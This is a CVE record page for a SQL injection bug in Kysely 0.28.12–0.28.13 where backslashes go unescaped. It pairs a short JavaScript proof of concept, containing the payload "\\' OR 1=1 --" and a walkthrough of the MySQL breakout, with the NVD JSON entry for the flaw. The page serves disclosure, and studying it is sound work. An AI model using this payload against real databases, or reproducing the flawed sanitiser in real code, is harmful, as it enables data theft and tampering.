CVE-2026-33442

// Conceptual PoC for CVE-2026-33442 // Demonstrating the bypass of sanitizeStringLiteral function vulnerableSanitize(str) { // Kysely 0.28.12/0.28.13 logic: escapes single quotes only return str.replace(/'/g, "''"); } // Attacker payload: A backslash followed by a single quote const userInput = "\\' OR 1=1 --"; // The query construction const query = `SELECT * FROM users WHERE name = '${vulnerableSanitize(userInput)}'`; console.log("Generated SQL:", query); // Output: SELECT * FROM users WHERE name = '\'' OR 1=1 --' /* Analysis in MySQL (BACKSLASH_ESCAPES mode): 1. The string starts at the first quote. 2. It encounters the backslash \ . 3. The backslash escapes the following single quote ' . 4. The string literal effectively ends after the escaped quote. 5. The ' OR 1=1 --' part is interpreted as SQL code, not a string. Result: SQL Injection successful. */

{"cve": {"id": "CVE-2026-33442", "sourceIdentifier": "[email protected]", "published": "2026-03-26T17:16:40.850", "lastModified": "2026-03-31T21:27:04.617", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kysely is a type-safe TypeScript SQL query builder. In versions 0.28.12 and 0.28.13, the `sanitizeStringLiteral` method in Kysely's query compiler escapes single quotes (`'` → `''`) but does not escape backslashes. On MySQL with the default `BACKSLASH_ESCAPES` SQL mode, an attacker can inject a backslash before a single quote to neutralize the escaping, breaking out of the JSON path string literal and injecting arbitrary SQL. Version 0.28.14 fixes the issue."}, {"lang": "es", "value": "Kysely es un constructor de consultas SQL de TypeScript con tipado seguro. En las versiones 0.28.12 y 0.28.13, el método `sanitizeStringLiteral` en el compilador de consultas de Kysely escapa las comillas simples (`'` ? `''`) pero no escapa las barras invertidas. En MySQL con el modo SQL predeterminado `BACKSLASH_ESCAPES`, un atacante puede inyectar una barra invertida antes de una comilla simple para neutralizar el escape, saliendo del literal de cadena de ruta JSON e inyectando SQL arbitrario. La versión 0.28.14 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kysely:kysely:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "0.28.12", "versionEndExcluding": "0.28.14", "matchCriteriaId": "2CD191E8-8EA7-43BA-B237-9C2091B32B93"}]}]}], "references": [{"url": "https://github.com/kysely-org/kysely/security/advisories/GHSA-fr9j-6mvq-frcv", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}